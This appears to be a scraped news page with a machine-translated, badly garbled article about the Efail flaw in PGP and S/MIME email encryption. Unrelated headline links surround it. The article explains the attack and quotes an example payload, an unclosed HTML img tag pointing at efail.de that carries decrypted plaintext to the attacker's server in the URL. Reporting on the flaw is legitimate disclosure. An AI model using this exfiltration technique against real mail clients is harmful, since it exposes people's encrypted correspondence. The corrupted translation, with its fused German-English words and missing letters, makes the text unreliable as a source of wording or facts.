Breaking News                 Latest News            Usa News                 Diet News

Negotiating Tips to Get the Best Car Lease
A security issue called Efail endangers the email encryption of PGP and S/MIME. The problem: The technology has stopped at the level of the Nineties.

PGP and S/MIME: unsecured encryption

A security issue called Efail endangers the email encryption of PGP and S/MIME. The problem: The technology has stopped at the level of the Nineties.

PGP and S/MIME: unsecured encryption
Content
  • Page 1 — Unsecured encryption
  • Page 2 — debate on responsibility
  • Read on a page

    A team of VonIT security researchers from Bochum and Münster has discovered verschiedeneSicherheitsprobleme in encryption technologies for e-mails. They have baptized ir attack Efail. Dabeinutzen a weakness of old but still used encryption technologies called OPENPGP and S/MIME and combine m with possibilities Vonmodernen mail programs that can display mails with images and or contents – so-called HTML mails.

    So far, DieMailverschlüsselung was particularly critical because sievergleichsweise is difficult to use and to set up. In practice, refore, only a small minority of users and users use encrypted e-mails. For most users, attack has also WenigPraxisrelevanz – normal, i.e. unencrypted emails are just as unsicherwie y were before. Likewise not affected by attack is Diesogenannte transport encryption with TLS. However, it only protects user and its mail provider.

    Orwise encryption MitPGP or S/MIME: If users use m correctly, it offers a high degree of security, one thought anyway. This view now gets some scratches, even if researchers do not directly attack encryption itself. With a trick, however, attackers can have content DerNachrichten sent after decryption.

    The encryption is bypassed

    How is that possible? Both Technikennutzen encryption modes, which do not guarantee aunticity of data. This means that an attacker cannot read mail directly, he kannaber manipulate its contents. The details are a little more complex, Abervereinfacht said: If an attacker accesses an encrypted Mailhat, for example, by taking m with a man-in--middle attack, he can generate Eineauf ir second encrypted mail based on m. It has partially anor, controlled content.

    This property uses Efailaus. Modern mail programs and also webmailers make it possible to make e-mails in several parts extensive. In this way, images or fonts can be used Hispanics design possibilities of HTML standard, which also represents dieBasis of websites. The trick that is used at Efail: email is rewritten so that it sends an image from attacker's server lädtund unencrypted content of original mail.

    For example: DieAngreiferin sends an HTML part as first part of a message, derbeispielsweise loads an image, but does not close HTML tag. So about lt; img src = "http://efail.de/. Second, it attaches encrypted part of a mail that you have read. ImMailclient of victim now happens: first, encrypted part is decrypted. Second, in this case, an image is loaded from server DerAngreiferin. The path is appended to content of decrypted Textteilscodiert, such as: Http://efail.de/GEHEIMER_TEXT

    An attacker does not decrypt diemail himself, but he allows recipient of mail to decrypt message and n send it in plain text to a server under his control. This also has consequence that even in past Verschickteverschlüsselte messages are at risk.

    Breaking News Headlines

    Some Common Gambling Superstitions
    Some Common Gambling Superstitions
    Video Editing for Beginners: Things You Need to Get Started
      Video Editing for Beginners: Things You Need to Get Started
    Choosing the Best Retail Franchise
    Choosing the Best Retail Franchise
    Benefits of Mobile Technology for Business Improvement
    Benefits of Mobile Technology for Business Improvement
    Promoting calls to Ryanair at a meeting following the decision to charge for climbing on board hand luggage
    Promoting calls to Ryanair at a meeting following the decision to charge for climbing on board hand luggage
    Macri, forced to ask for more money to the IMF to ward off the growing specter of the default
    Macri, forced to ask for more money to the IMF to ward off the growing specter of the default
    Utilize your online trading resources
    Utilize your online trading resources
    Sampdoria, Giampaolo ready to get back in the fieldx3a; quot;Right to just stop, debut egrave; joyquot;
    Sampdoria, Giampaolo ready to get back in the fieldx3a; quot;Right to just stop, debut egrave; joyquot;
    Napoli-Milan 3-2, Ancelotti still in recovery limelight Gattuso from 0-2 to 3-2
    Napoli-Milan 3-2, Ancelotti still in recovery limelight Gattuso from 0-2 to 3-2
    Juventus-Lazio 2-0: Ronaldo doesn't score but we think Totti and the French powerhouse
    Juventus-Lazio 2-0: Ronaldo doesn't score but we think Totti and the French powerhouse
    This is the ambitious plan of Norway to have the first fleet of aircraft electrical of the world
    This is the ambitious plan of Norway to have the first fleet of aircraft electrical of the world
    The dome of Ryanair has already lost 34 million of his bonus due to the impact of the strikes of this summer
    The dome of Ryanair has already lost 34 million of his bonus due to the impact of the strikes of this summer
    Pages
    NEWS ARCHIVES